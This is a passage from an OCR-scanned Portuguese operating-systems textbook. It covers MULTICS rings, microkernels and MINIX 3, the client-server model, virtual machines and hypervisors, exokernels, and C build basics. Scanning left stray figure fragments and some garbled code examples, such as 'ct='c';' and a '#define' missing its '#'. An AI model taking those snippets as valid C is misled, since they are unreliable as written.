1 Memória e gerenciamento de tambor 
0 Alocação do processador e multiprogramação 
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Outra generalização do conceito de camadas estava 
presente no sistema MULTICS. Em vez de camadas, 
MULTICS foi descrito como tendo uma série de anéis 
concêntricos, com os anéis internos sendo mais privile- 
giados do que os externos (o que é efetivamente a mesma 
coisa). Quando um procedimento em um anel exterior 
queria chamar um procedimento em um anel interior, ele 
tinha de fazer o equivalente de uma chamada de sistema, 
isto é, uma instrução de desvio, TRAP, cujos parâmetros 
eram cuidadosamente conferidos por sua validade antes 
de a chamada ter permissão para prosseguir. Embora todo 
o sistema operacional fosse parte do espaço de endereço 
de cada processo de usuário em MULTICS, o hardware 
tornou possível que se designassem rotinas individuais 
(segmentos de memória, na realidade) como protegidos 
contra leitura, escrita ou execução. 

Enquanto o esquema de camadas THE era na reali- 
dade somente um suporte para o projeto, pois em última 
análise todas as partes do sistema estavam unidas em 
um único programa executável, em MULTICS, o meca- 
nismo de anéis estava bastante presente no momento de 
execução e imposto pelo hardware. A vantagem do me- 
canismo de anéis é que ele pode ser facilmente estendi- 
do para estruturar subsistemas de usuário. Por exemplo, 
um professor poderia escrever um programa para testar 
e atribuir notas a programas de estudantes executando- 
-o no anel n, com os programas dos estudantes seriam 
executados no anel n + 1, de maneira que eles não pu- 
dessem mudar suas notas. 


1.7.3 Micronúcleos 


Com a abordagem de camadas, os projetistas têm 
uma escolha de onde traçar o limite núcleo-usuário. 
Tradicionalmente, todas as camadas entram no núcleo, 
mas isso não é necessário. Na realidade, um forte argu- 
mento pode ser defendido para a colocação do mínimo 
possível no modo núcleo, pois erros no código do nú- 
cleo podem derrubar o sistema instantaneamente. Em 
comparação, processos de usuário podem ser configura- 
dos para ter menos poder, de maneira que um erro possa 
não ser fatal. 

Vários pesquisadores estudaram repetidamente o 
número de erros por 1.000 linhas de código (por exem- 
plo, BASILLI e PERRICONE, 1984; OSTRAND e 
WEYUKER, 2002). A densidade de erros depende do 
tamanho do módulo, idade do módulo etc., mas um nú- 
mero aproximado para sistemas industriais sérios fica 
entre dois e dez erros por mil linhas de código. Isso 
significa que em um sistema operacional monolítico 
de cinco milhões de linhas de código é provável que 
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contenha entre 10.000 e 50.000 erros no núcleo. Nem 
todos são fatais, é claro, tendo em vista que alguns erros 
podem ser coisas como a emissão de uma mensagem 
de erro incorreta em uma situação que raramente ocor- 
re. Mesmo assim, sistemas operacionais são a tal ponto 
sujeitos a erros, que os fabricantes de computadores co- 
locam botões de reinicialização neles (muitas vezes no 
painel da frente), algo que os fabricantes de TVs, apa- 
relhos de som e carros não o fazem, apesar da grande 
quantidade de software nesses dispositivos. 

A ideia básica por tras do projeto de microntcleo 
é atingir uma alta confiabilidade através da divisão do 
sistema operacional em módulos pequenos e bem de- 
finidos, apenas um dos quais — o micronúcleo — é 
executado em modo núcleo e o resto é executado como 
processos de usuário comuns relativamente sem poder. 
Em particular, ao se executar cada driver de dispositi- 
vo e sistema de arquivos como um processo de usuário 
em separado, um erro em um deles pode derrubar esse 
componente, mas não consegue derrubar o sistema in- 
teiro. Desse modo, um erro no driver de áudio fará que 
o som fique truncado ou pare, mas não derrubará o com- 
putador. Em comparação, em um sistema monolítico, 
com todos os drivers no núcleo, um driver de áudio com 
problemas pode facilmente referenciar um endereço de 
memória inválido e provocar uma parada dolorosa no 
sistema instantaneamente. 

Muitos micronúcleos foram implementados e em- 
pregados por décadas (HAERTIG et al., 1997; HEISER 
et al., 2006; HERDER et al., 2006; HILDEBRAND, 
1992; KIRSCH et al., 2005; LIEDTKE, 1993, 1995, 
1996; PIKE et al., 1992; e ZUBERI et al., 1999). Com a 
exceção do OS X, que é baseado no microntcleo Mach 
(ACETTA et al., 1986), sistemas operacionais de com- 
putadores de mesa comuns não usam micronúcleos. No 
entanto, eles são dominantes em aplicações de tempo 
real, industriais, de aviônica e militares, que são cru- 
ciais para missões e têm exigências de confiabilidade 
muito altas. Alguns dos micronúcleos mais conhecidos 
incluem Integrity, K42, L4, PikeOS, QNX, Symbian e 
MINIX 3. Daremos agora uma breve visão geral do MI- 
NIX 3, que levou a ideia da modularidade até o limite, 
decompondo a maior parte do sistema operacional em 
uma série de processos de modo usuário independentes. 
MINIX 3 é um sistema em conformidade com o POSIX, 
de código aberto e gratuitamente disponível em <www. 
minix3.org> (GIUFFRIDA et al., 2012; GIUFFRIDA et 
al., 2013; HERDER et al., 2006; HERDER et al., 2009; 
e HRUBY et al., 2013). 

O micronúcleo MINIX 3 tem apenas em torno de 
12.000 linhas de C e cerca de 1.400 linhas de assembler 


para funções de nível muito baixo como capturar in- 
terrupções e chavear processos. O código C gerencia 
e escalona processos, lida com a comunicação entre 
eles (passando mensagens entre processos) e oferece 
um conjunto de mais ou menos 40 chamadas de nú- 
cleo que permitem que o resto do sistema operacional 
faça o seu trabalho. Essas chamadas realizam funções 
como associar os tratadores às interrupções, transferir 
dados entre espaços de endereços e instalar mapas de 
memória para processos novos. A estrutura de proces- 
so de MINIX 3 é mostrada na Figura 1.26, com os tra- 
tadores de chamada de núcleo rotulados Sys. O driver 
de dispositivo para o relógio também está no núcleo, 
pois o escalonador interage de perto com ele. Os ou- 
tros drivers de dispositivos operam como processos de 
usuário em separado. 

Fora do núcleo, o sistema é estruturado como três 
camadas de processos, todos sendo executados em 
modo usuário. A camada mais baixa contém os drivers 
de dispositivos. Como são executados em modo usu- 
ário, eles não têm acesso físico ao espaço da porta de 
E/S e não podem emitir comandos de E/S diretamente. 
Em vez disso, para programar um dispositivo de E/S, 
o driver constrói uma estrutura dizendo quais valores 
escrever para quais portas de E/S e faz uma chamada 
de núcleo dizendo para o núcleo fazer a escrita. Essa 
abordagem significa que o núcleo pode conferir para 
ver que o driver está escrevendo (ou lendo) a partir da 
E/S que ele está autorizado a usar. Em consequência (e 
diferentemente de um projeto monolítico), um driver 
de áudio com erro não consegue escrever por acidente 
no disco. 

Acima dos drivers há outra camada no modo usu- 
ário contendo os servidores, que fazem a maior parte 
do trabalho do sistema operacional. Um ou mais ser- 
vidores de arquivos gerenciam o(s) sistema(s) de ar- 
quivos, o gerente de processos cria, destrói e gerencia 
processos, e assim por diante. Programas de usuários 
obtêm serviços de sistemas operacionais enviando 
mensagens curtas para os servidores solicitando as 
chamadas de sistema POSIX. Por exemplo, um pro- 
cesso precisando fazer uma read, envia uma mensa- 
gem para um dos servidores de arquivos dizendo a ele 
o que ler. 

Um servidor interessante é o servidor de reencar- 
nação, cujo trabalho é conferir se os outros servidores 
e drivers estão funcionando corretamente. No caso da 
detecção de um servidor ou driver defeituoso, ele é au- 
tomaticamente substituído sem qualquer intervenção do 
usuário. Dessa maneira, o sistema está regenerando a si 
mesmo e pode atingir uma alta confiabilidade. 


[e] RS Estrutura simplificada do sistema MINIX. 
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O sistema tem muitas restrições limitando o poder 
de cada processo. Como mencionado, os drivers podem 
tocar apenas portas de E/S autorizadas, mas o acesso 
às chamadas de núcleo também é controlado processo 
a processo, assim como a capacidade de enviar mensa- 
gens para outros processos. Processos também podem 
conceder uma permissão limitada para outros processos 
para que o núcleo acesse seus espaços de endereçamen- 
to. Como exemplo, um sistema de arquivos pode con- 
ceder uma permissão para que a unidade de disco deixe 
o núcleo colocar uma leitura recente de um bloco do 
disco em um endereço específico dentro do espaço de 
endereço do sistema de arquivos. A soma de todas essas 
restrições é que cada driver e servidor têm exatamente 
o poder de fazer o seu trabalho e nada mais, dessa ma- 
neira limitando muito o dano que um componente com 
erro pode provocar. 

Uma ideia de certa maneira relacionada a ter um nú- 
cleo mínimo é colocar o mecanismo para fazer algo no 
núcleo, mas não a política. Para esclarecer esse ponto, 
considere o escalonamento de processos. Um algoritmo 
de escalonamento relativamente simples é designar uma 
prioridade numérica para todo processo e então fazer 
que o núcleo execute o processo mais prioritário e que 
seja executável. O mecanismo — no núcleo — é procu- 
rar pelo processo mais prioritário e executá-lo. A poli- 
tica — designar prioridades para processos — pode ser 
implementada por processos de modo usuário. Dessa 
maneira, política e mecanismo podem ser desacoplados 
e o núcleo tornado menor. 


1.7.4 O modelo cliente-servidor 


Uma ligeira variação da ideia do micronúcleo é dis- 
tinguir duas classes de processos, os servidores, que 








Foo) (sys 


prestam algum serviço, e os clientes, que usam esses 
serviços. Esse modelo é conhecido como o modelo 
cliente-servidor. Muitas vezes, a camada mais baixa é 
a do micronúcleo, mas isso não é necessário. A essência 
encontra-se na presença de processos clientes e proces- 
sos servidores. 

A comunicação entre clientes e servidores é realiza- 
da muitas vezes pela troca de mensagens. Para obter um 
serviço, um processo cliente constrói uma mensagem 
dizendo o que ele quer e a envia ao serviço apropriado. 
O serviço então realiza o trabalho e envia de volta a 
resposta. Se acontecer de o cliente e o servidor serem 
executados na mesma máquina, determinadas otimiza- 
ções são possíveis, mas conceitualmente, ainda estamos 
falando da troca de mensagens aqui. 

Uma generalização óbvia dessa ideia é ter os clien- 
tes e servidores sendo executados em computadores di- 
ferentes, conectados por uma rede local ou de grande 
área, como descrito na Figura 1.27. Tendo em vista que 
os clientes comunicam-se com os servidores enviando 
mensagens, os clientes não precisam saber se as men- 
sagens são entregues localmente em suas próprias má- 
quinas, ou se são enviadas através de uma rede para 
servidores em uma máquina remota. No que diz res- 
peito ao cliente, a mesma coisa acontece em ambos os 
casos: pedidos são enviados e as respostas retornadas. 
Desse modo, o modelo cliente-servidor é uma abstração 
que pode ser usada para uma única máquina ou para 
uma rede de máquinas. 

Cada vez mais, muitos sistemas envolvem usuários 
em seus PCs em casa como clientes e grandes máqui- 
nas em outra parte operando como servidores. Na rea- 
lidade, grande parte da web opera dessa maneira. Um 
PC pede uma página na web para um servidor e ele a 
entrega. Esse é o uso típico do modelo cliente-servidor 
em uma rede. 
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lei TEFA O modelo cliente-servidor em uma rede. 
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1.7.5 Máquinas virtuais 


Os lançamentos iniciais do OS/360 foram estrita- 
mente sistemas em lote. Não obstante isso, muitos usu- 
ários do 360 queriam poder trabalhar interativamente 
em um terminal, de maneira que vários grupos, tanto 
dentro quanto fora da IBM, decidiram escrever siste- 
mas de compartilhamento de tempo para ele. O siste- 
ma de compartilhamento de tempo oficial da IBM, 
TSS/360, foi lançado tarde, e quando enfim chegou, 
era tão grande e lento que poucos converteram-se a 
ele. Ele foi finalmente abandonado após o desenvolvi- 
mento ter consumido algo em torno de US$ 50 milhões 
(GRAHAM, 1970). Mas um grupo no Centro Cienti- 
fico da IBM em Cambridge, Massachusetts, produziu 
um sistema radicalmente diferente que a IBM por fim 
aceitou como produto. Um descendente linear, chamado 
z/VM, é hoje amplamente usado nos computadores de 
grande porte da IBM, os zSeries, que são intensamente 
usados em grandes centros de processamento de dados 
corporativos, por exemplo, como servidores de comér- 
cio eletrônico que lidam com centenas ou milhares de 
transações por segundo e usam bancos de dados cujos 
tamanhos chegam a milhões de gigabytes. 


VM/370 


Esse sistema, na origem chamado CP/CMS e mais 
tarde renomeado VM/370 (SEAWRIGHT e MacKIN- 
NON, 1979), foi baseado em uma observação astuta: 


le RS A estrutura do VM/370 com CMS. 


Máquina 3 Máquina 4 





Servidor de processo Servidor de terminal 











Núcleo Núcleo 


um sistema de compartilhamento de tempo fornece (1) 
multiprogramação e (2) uma máquina estendida com 
uma interface mais conveniente do que apenas o hard- 
ware. A essência do VM/370 é separar completamente 
essas duas funções. 

O cerne do sistema, conhecido como o monitor de 
máquina virtual, opera direto no hardware e realiza 
a multiprogramação, fornecendo não uma, mas várias 
máquinas virtuais para a camada seguinte, como mos- 
trado na Figura 1.28. No entanto, diferentemente de 
todos os outros sistemas operacionais, essas máquinas 
virtuais não são máquinas estendidas, com arquivos e 
outros aspectos interessantes. Em vez disso, elas são 
cópias exatas do hardware exposto, incluindo modos 
núcleo/usuário, E/S, interrupções e tudo mais que a má- 
quina tem. 

Como cada máquina virtual é idêntica ao hardware 
original, cada uma delas pode executar qualquer sistema 
operacional capaz de ser executado diretamente sobre o 
hardware. Máquinas virtuais diferentes podem — e fre- 
quentemente o fazem — executar diferentes sistemas 
operacionais. No sistema VM/370 original da IBM, em 
algumas é executado o sistema operacional OS/360 ou 
um dos outros sistemas operacionais de processamento 
de transações ou em lote grande, enquanto em outras 
é executado um sistema operacional monousuário inte- 
rativo chamado CMS (Conversational Monitor Sys- 
tem — sistema monitor conversacional), para usuários 
interativos em tempo compartilhado. Esse sistema era 
popular entre os programadores. 


Virtual 370s 
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Armadilha aqui 


VM/370 


Chamadas de sistema aqui 


Armadilha aqui 


370 hardware 





Quando um programa CMS executava uma chamada 
de sistema, ela era desviada para o sistema operacio- 
nal na sua própria máquina virtual, não para o VM/370, 
como se estivesse executando em uma máquina real em 
vez de uma virtual. O CMS então emitia as instruções 
de E/S normais de hardware para leitura do seu disco 
virtual ou o que quer que fosse necessário para execu- 
tar a chamada. Essas instruções de E/S eram desviadas 
pelo VM/370, que então as executava como parte da 
sua simulação do hardware real. Ao separar completa- 
mente as funções da multiprogramação e da provisão de 
uma máquina estendida, cada uma das partes podia ser 
muito mais simples, mais flexível e muito mais fácil de 
manter. 

Em sua encarnação moderna, o z/VM é normalmen- 
te usado para executar sistemas operacionais completos 
em vez de sistemas de usuário único desmontados como 
o CMS. Por exemplo, o zSeries é capaz de uma ou mais 
máquinas virtuais Linux junto com sistemas operacio- 
nais IBM tradicionais. 


Máquinas virtuais redescobertas 


Embora a IBM tenha um produto de máquina virtu- 
al disponível há quatro décadas, e algumas outras em- 
presas, incluindo a Oracle e Hewlett-Packard, tenham 
recentemente acrescentado suporte de máquina virtual 
para seus servidores empreendedores de alto desempe- 
nho, a ideia da virtualização foi em grande parte igno- 
rada no mundo dos PCs até há pouco tempo. Mas nos 
últimos anos, uma combinação de novas necessidades, 
novo software e novas tecnologias combinaram-se para 
torná-la um tópico de alto interesse. 

Primeiro as necessidades. Muitas empresas tradicio- 
nais executavam seus próprios servidores de correio, 
de web, de FTP e outros servidores em computadores 
separados, às vezes com sistemas operacionais diferen- 
tes. Elas veem a virtualização como uma maneira de 
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executar todos eles na mesma maquina sem correr 0 ris- 
co de um travamento em um servidor derrubar a todos. 

A virtualização também é popular no mundo da hos- 
pedagem de páginas da web. Sem a virtualização, os 
clientes de hospedagem na web sao obrigados a esco- 
lher entre a hospedagem compartilhada (que dá a eles 
uma conta de acesso a um servidor da web, mas nenhum 
controle sobre o software do servidor) e a hospedagem 
dedicada (que dá a eles a própria máquina, que é muito 
flexível, mas cara para sites de pequeno a médio porte). 
Quando uma empresa de hospedagem na web oferece 
máquinas virtuais para alugar, uma única maquina fisi- 
ca pode executar muitas máquinas virtuais, e cada uma 
delas parece ser uma máquina completa. Clientes que 
alugam uma máquina virtual podem executar qualquer 
sistema operacional e software que eles quiserem, mas 
a uma fração do custo de um servidor dedicado (pois 
a mesma máquina física dá suporte a muitas máquinas 
virtuais ao mesmo tempo). 

Outro uso da virtualização é por usuários finais que 
querem poder executar dois ou mais sistemas opera- 
cionais ao mesmo tempo, digamos Windows e Linux, 
pois alguns dos seus pacotes de aplicativos favoritos 
são executados em um sistema e outros no outro sis- 
tema. Essa situação é ilustrada na Figura 1.29(a), onde 
o termo “monitor de máquina virtual” foi renomeado 
como hipervisor tipo 1, que é bastante usado hoje, pois 
“monitor de máquina virtual” exige mais toques no te- 
clado do que as pessoas estão preparadas para suportar 
agora. Observe que muitos autores usam os dois termos 
naturalmente. 

Embora hoje ninguém discuta a atratividade das má- 
quinas virtuais, o problema então era de implementa- 
ção. A fim de executar um software de máquina virtual 
em um computador, a sua CPU tem de ser virtualizável 
(POPEK e GOLDBERG, 1974). Resumindo, eis o pro- 
blema. Quando um sistema operacional sendo executa- 
do em uma máquina virtual (em modo usuário) executa 
uma instrução privilegiada, como modificar a PSW ou 


le EE (a) Um hipervisor de tipo 1. (b) Um hipervisor de tipo 2 puro. (c) Um hipervisor de tipo 2 na prática. 
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realizar uma E/S, é essencial que o hardware crie uma 
armadilha que direcione para o monitor da máquina 
virtual, de maneira que a instrução possa ser emulada 
em software. Em algumas CPUs — notadamente a Pen- 
tium, suas predecessoras e seus clones —, tentativas de 
executar instruções privilegiadas em modo usuário são 
simplesmente ignoradas. Essa propriedade impossibili- 
tou ter máquinas virtuais nesse hardware, o que explica 
a falta de interesse no mundo x86. É claro, havia inter- 
pretadores para o Pentium, como Bochs, que eram exe- 
cutados nele, porém com uma perda de desempenho de 
uma ou duas ordens de magnitude, eles não eram úteis 
para realizar trabalhos sérios. 

Essa situação mudou em consequência de uma sé- 
rie de projetos de pesquisa acadêmica na década de 
1990 e nos primeiros anos deste milênio, notavelmente 
Disco em Stanford (BUGNION et al., 1997) e Xen na 
Universidade de Cambridge (BARHAM et al., 2003). 
Essas pesquisas levaram a vários produtos comerciais 
(por exemplo, VMware Workstation e Xen) e um re- 
nascimento do interesse em máquinas virtuais. Além do 
VMware e do Xen, hipervisores populares hoje em dia 
incluem KVM (para o núcleo Linux), VirtualBox (da 
Oracle) e Hyper-V (da Microsoft). 

Alguns desses primeiros projetos de pesquisa melho- 
raram o desempenho de interpretadores como o Bochs 
ao traduzir blocos de código rapidamente, armazenan- 
do-os em uma cache interna e então reutilizando-os se 
eles fossem executados de novo. Isso melhorou bastante 
o desempenho, e levou ao que chamaremos de simula- 
dores de máquinas, como mostrado na Figura 1.29(b). 
No entanto, embora essa técnica, conhecida como tra- 
dução binária, tenha melhorado as coisas, os sistemas 
resultantes, embora bons o suficiente para terem estudos 
publicados em conferências acadêmicas, ainda não eram 
rápidos o suficiente para serem usados em ambientes 
comerciais onde o desempenho é muito importante. 

O passo seguinte para a melhoria do desempenho 
foi acrescentar um módulo núcleo para fazer parte do 
trabalho pesado, como mostrado na Figura 1.29(c). Na 
prática agora, todos os hipervisores disponíveis comer- 
cialmente, como o VMware Workstation, usam essa 
estratégia híbrida (e têm muitas outras melhorias tam- 
bém). Eles são chamados de hipervisores tipo 2 por 
todos, então acompanharemos (de certa maneira a con- 
tragosto) e usaremos esse nome no resto deste livro, em- 
bora preferissemos chamá-los de hipervisores tipo 1.7 
para refletir o fato de que eles não são inteiramente pro- 
gramas de modo usuário. No Capítulo 7, descreveremos 
em detalhes o funcionamento do VMware Workstation 
e o que as suas várias partes fazem. 


Na prática, a distinção real entre um hipervisor tipo 
1 e um hipervisor tipo 2 é que o tipo 2 usa um sistema 
operacional hospedeiro e o seu sistema de arquivos 
para criar processos, armazenar arquivos e assim por 
diante. Um hipervisor tipo 1 não tem suporte subjacente 
e precisa realizar todas essas funções sozinho. 

Após um hipervisor tipo 2 ser inicializado, ele lê o 
CD-ROM de instalação (ou arquivo de imagem CD- 
-ROM) para o sistema operacional hóspede escolhido 
e o instala em um disco virtual, que é apenas um grande 
arquivo no sistema de arquivos do sistema operacional 
hospedeiro. Hipervisores tipo 1 não podem realizar isso 
porque não há um sistema operacional hospedeiro para 
armazenar os arquivos. Eles têm de gerenciar sua própria 
armazenagem em uma partição de disco bruta. 

Quando o sistema operacional hóspede é inicializa- 
do, ele faz o mesmo que no hardware de verdade, tipi- 
camente iniciando alguns processos de segundo plano 
e então uma interface gráfica GUI. Para o usuário, o 
sistema operacional hóspede comporta-se como quando 
está sendo executado diretamente no hardware, embora 
não seja o caso aqui. 

Uma abordagem diferente para o gerenciamento de 
instruções de controle é modificar o sistema operacio- 
nal para removê-las. Essa abordagem não é a verdadeira 
virtualização, mas a paravirtualização. Discutiremos a 
virtualização em mais detalhes no Capítulo 7. 


A máquina virtual Java 


Outra área onde as máquinas virtuais são usadas, mas 
de uma maneira de certo modo diferente, é na execu- 
ção de programas Java. Quando a Sun Microsystems in- 
ventou a linguagem de programação Java, ela também 
inventou uma máquina virtual (isto é, uma arquitetu- 
ra de computadores) chamada de JVM (Java Virtual 
Machine — máquina virtual Java). O compilador Java 
produz código para a JVM, que então é executado por 
um programa interpretador da JVM. A vantagem dessa 
abordagem é que o código JVM pode ser enviado pela 
internet para qualquer computador que tenha um inter- 
pretador JVM e ser executado lá. Se o compilador ti- 
vesse produzido programas binários x86 ou SPARC, por 
exemplo, eles não poderiam ser enviados e executados 
em qualquer parte tão facilmente. (É claro, a Sun pode- 
ria ter produzido um compilador que produzisse binários 
SPARC e então distribuído um interpretador SPARC, 
mas a JVM é uma arquitetura muito mais simples de in- 
terpretar.) Outra vantagem de se usar a JVM é que se 
o interpretador for implementado da maneira adequada, 
o que não é algo completamente trivial, os programas 


JVM que chegam podem ser verificados, por segurança, 
e então executados em um ambiente protegido para que 
não possam roubar dados ou causar qualquer dano. 


1.7.6 Exonúcleos 


Em vez de clonar a máquina real, como é feito com 
as máquinas virtuais, outra estratégia é dividi-la, ou em 
outras palavras, dar a cada usuário um subconjunto dos 
recursos. Desse modo, uma máquina virtual pode obter 
os blocos de disco de 0 a 1.023, a próxima pode ficar 
com os blocos 1.024 a 2.047 e assim por diante. 

Na camada de baixo, executando em modo núcleo, 
há um programa chamado exonúcleo (ENGLER et al., 
1995). Sua tarefa é alocar recursos às máquinas virtuais 
e então conferir tentativas de usá-las para assegurar-se 
de que nenhuma máquina esteja tentando usar os recur- 
sos de outra pessoa. Cada máquina virtual no nível do 
usuário pode executar seu próprio sistema operacional, 
como na VM/370 e no modo virtual 8086 do Pentium, 
exceto que cada uma está restrita a usar apenas os recur- 
sos que ela pediu e foram alocados. 

A vantagem do esquema do exonúcleo é que ele pou- 
pa uma camada de mapeamento. Nos outros projetos, 
cada máquina virtual pensa que ela tem seu próprio dis- 
co, com blocos sendo executados de 0 a algum maximo, 
de maneira que o monitor da máquina virtual tem de 
manter tabelas para remapear os endereços de discos (e 
todos os outros recursos). Com o exonúcleo, esse rema- 
peamento não é necessário. O exonúcleo precisa apenas 
manter o registro de para qual máquina virtual foi atri- 
buído qual recurso. Esse método ainda tem a vantagem 
de separar a multiprogramação (no exonúcleo) do có- 
digo do sistema operacional do usuário (em espaço do 
usuário), mas com menos sobrecarga, tendo em vista 
que tudo o que o exonúcleo precisa fazer é manter as 
máquinas virtuais distantes umas das outras. 


1.8 O mundo de acordo com a linguagem C 


Sistemas operacionais normalmente são grandes pro- 
gramas C (ou às vezes C++) consistindo em muitas partes 
escritas por muitos programadores. O ambiente usado para 
desenvolver os sistemas operacionais é muito diferente do 
que os indivíduos (tais como estudantes) estão acostuma- 
dos quando estão escrevendo programas pequenos Java. 
Esta seção é uma tentativa de fazer uma introdução muito 
breve para o mundo da escrita de um sistema operacional 
para programadores Java ou Python modestos. 
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1.8.1 A linguagem C 


Este não é um guia para a linguagem C, mas um bre- 
ve resumo de algumas das diferenças fundamentais en- 
tre C e linguagens como Python e especialmente Java. 
Java é baseado em C, portanto há muitas similaridades 
entre as duas. Python é de certa maneira diferente, mas 
ainda assim ligeiramente similar. Por conveniência, fo- 
caremos em Java. Java, Python e C são todas linguagens 
imperativas com tipos de dados, variáveis e comandos 
de controle, por exemplo. Os tipos de dados primitivos 
em C são inteiros (incluindo curtos e longos), caracteres 
e números de ponto flutuante. Os tipos de dados com- 
postos em C são similares àqueles em Java, incluindo os 
comandos if, switch, for e while. Funções e parâmetros 
são mais ou menos os mesmos em ambas as linguagens. 

Uma característica de C que Java e Python não têm 
são os ponteiros explícitos. Um ponteiro é uma variável 
que aponta para (isto é, contém o endereço de) uma va- 
riável ou estrutura de dados. Considere as linhas 


char c1, C2, *p; 


ct='c'; 
p = &c1; 
c2 =*p; 


que declara c/ e c2 como variáveis de caracteres e p 
como sendo uma variável que aponta para (isto é, con- 
tém o endereço de) um caractere. A primeira atribuição 
armazena o código ASCII para o caractere “c” na va- 
riável cl. A segunda designa o endereço de c/ para a 
variável do ponteiro p. A terceira designa o conteúdo 
da variável apontada por p para a variável c2, de ma- 
neira que após esses comandos terem sido executados, 
c2 também contém o código ASCII para “c”. Na teo- 
ria, ponteiros possuem tipos, assim não se supõe que 
você vá designar o endereço de um número em ponto 
flutuante a um ponteiro de caractere, porém na prática 
compiladores aceitam tais atribuições, embora algumas 
vezes com um aviso. Ponteiros são uma construção 
muito poderosa, mas também uma grande fonte de erros 
quando usados de modo descuidado 

Algumas coisas que C não tem incluem cadeias de 
caracteres incorporadas, threads, pacotes, classes, ob- 
jetos, segurança de tipos e coletor de lixo. Todo arma- 
zenamento em C é estático ou explicitamente alocado e 
liberado pelo programador, normalmente com as fun- 
ções de biblioteca malloc e free. É a segunda proprie- 
dade — controle do programador total sobre a memória 
— junto com ponteiros explícitos que torna C atraente 
para a escrita de sistemas operacionais. Sistemas opera- 
cionais são, até certo ponto, basicamente sistemas em 
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tempo real, até mesmo sistemas com propósito geral. 
Quando uma interrupção ocorre, o sistema operacional 
pode ter apenas alguns microssegundos para realizar 
alguma ação ou perder informações críticas. A entra- 
da do coletor de lixo em um momento arbitrário é algo 
intolerável. 


1.8.2 Arquivos de cabeçalho 


Um projeto de sistema operacional geralmente con- 
siste em uma série de diretórios, cada um contendo mui- 
tos arquivos .c, que contêm o código para alguma parte 
do sistema, junto com alguns arquivos de cabeçalho .h, 
que contêm declarações e definições usadas por um ou 
mais arquivos de códigos. Arquivos de cabeçalho tam- 
bém podem incluir macros simples, como em 


#define BUFFER SIZE 4096 


que permitem ao programador nomear constantes, as- 
sim, quando BUFFER SIZE é usado no código, ele é 
substituído durante a compilação pelo número 4096. 
Uma boa prática de programação C é nomear todas as 
constantes, com exceção de 0, 1 e —1, e às vezes até 
elas. Macros podem ter parâmetros como em 


define max(a, b) (a>b? a:b) 
que permite ao programador escrever 
i = max(j, k+1) 
e obter 
i = (j >k+1 ?j:k+1) 


para armazenar o maior entre j e k+/ em i. Cabeçalhos 
também podem conter uma compilação condicional, 
por exemplo 


#ifdef X86 
intel_int_ack(); 
#endif 


que compila uma chamada para a função intel int ack 
se o macro X86 for definido e nada mais de outra forma. 
A compilação condicional é intensamente usada para 
isolar códigos dependentes de arquitetura, assim um de- 
terminado código é inserido apenas quando o sistema 
for compilado no X86, outro código é inserido somente 
quando o sistema é compilado em um SPARC e assim 
por diante. Um arquivo .c pode incluir conjuntamente 
zero ou mais arquivos de cabeçalho usando a diretiva 
#include. Há também muitos arquivos de cabeçalho que 
são comuns a quase todos os .c e são armazenados em 
um diretório central. 


1.8.3 Grandes projetos de programação 


Para construir o sistema operacional, cada .c é com- 
pilado em um arquivo-objeto pelo compilador C. Ar- 
quivos-objeto, que têm o sufixo .o, contêm instruções 
binárias para a máquina destino. Eles serão mais tarde 
diretamente executados pela CPU. Não há nada seme- 
Ihante ao bytecode Java ou o bytecode Python no mun- 
do C. 

O primeiro passo do compilador C é chamado de 
pré-processador C. Quando lê cada arquivo .c, toda 
vez que ele atinge uma diretiva #include, ele vai e pega 
o arquivo cabeçalho nomeado nele e o processa, expan- 
dindo macros, lidando com a compilação condicional (e 
determinadas outras coisas) e passando os resultados ao 
próximo passo do compilador como se eles estivessem 
fisicamente incluídos. 

Tendo em vista que os sistemas operacionais são 
muito grandes (cinco milhões de linhas de código não é 
incomum), ter de recompilar tudo cada vez que um ar- 
quivo é alterado seria insuportável. Por outro lado, mu- 
dar um arquivo de cabeçalho chave que esteja incluído 
em milhares de outros arquivos não exige recompilar 
esses arquivos. Acompanhar quais arquivos-objeto de- 
pende de quais arquivos de cabeçalho seria completa- 
mente impraticável sem ajuda. 

Ainda bem que os computadores são muito bons 
precisamente nesse tipo de coisa. Nos sistemas UNIX, 
há um programa chamado make (com inúmeras varian- 
tes como gmake, pmake etc.) que lê o Makefile, que diz 
a ele quais arquivos são dependentes de quais outros 
arquivos. O que o make faz é ver quais arquivos-obje- 
to são necessários para construir o binário do sistema 
operacional e para cada um conferir para ver se algum 
dos arquivos dos quais ele depende (o código e os ca- 
beçalhos) foi modificado depois da última vez que o 
arquivo-objeto foi criado. Se isso ocorreu, esse arquivo- 
-objeto deve ser recompilado. Quando make determinar 
quais arquivos .c precisam ser recompilados, ele então 
invoca o compilador C para compilá-los novamente, 
reduzindo assim o número de compilações ao mínimo 
possível. Em grandes projetos, a criação do Makefile é 
propensa a erros, portanto existem ferramentas que fa- 
zem isso automaticamente. 

Uma vez que todos os arquivos .o estejam prontos, 
eles são passados para um programa chamado ligador 
(linker) para combinar todos eles em um único arqui- 
vo binário executável. Quaisquer funções de biblioteca 
chamadas também são incluídas nesse ponto, referên- 
cias interfuncionais resolvidas e endereços de máquinas 
relocados conforme a necessidade. Quando o ligador é 


terminado, o resultado é um programa executável, tra- 
dicionalmente chamado a.out em sistemas UNIX. Os 
vários componentes desse processo estão ilustrados na 
Figura 1.30 para um programa com três arquivos C e 
dois arquivos de cabeçalho. Embora estejamos discu- 
tindo o desenvolvimento de sistemas operacionais aqui, 
tudo isso se aplica ao desenvolvimento de qualquer pro- 
grama de grande porte. 


1.8.4 O modelo de execução 


Uma vez que os binários do sistema operacional 
tenham sido ligados, o computador pode ser reinicia- 
lizado e o novo sistema operacional carregado. Ao ser 
executado, ele pode carregar dinamicamente partes que 
não foram estaticamente incluídas no sistema binário, 
como drivers de dispositivo e sistemas de arquivos. No 
tempo de execução, o sistema operacional pode consis- 
tir de múltiplos segmentos, para o texto (o código de 
programa), os dados e a pilha. O segmento de texto é 
em geral imutável, não se alterando durante a execução. 
O segmento de dados começa em um determinado ta- 
manho e é inicializado com determinados valores, mas 
pode mudar e crescer conforme a necessidade. A pilha 
inicia vazia, mas cresce e diminui conforme as funções 
são chamadas e retornadas. Muitas vezes o segmento de 
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texto é colocado próximo à parte inferior da memória, 
o segmento de dados logo acima, com a capacidade de 
crescer para cima, e o segmento de pilha em um endere- 
ço virtual alto, com a capacidade de crescer para baixo, 
mas sistemas diferentes funcionam diferentemente. 

Em todos os casos, o código do sistema operacional é 
diretamente executado pelo hardware, sem interpretado- 
res ou compilação just-in-time, como é normal com Java. 


1.9 Pesquisa em sistemas operacionais 


A ciência de computação é um campo que avança 
rapidamente e é difícil de prever para onde ele está indo. 
Pesquisadores em universidades e laboratórios de pes- 
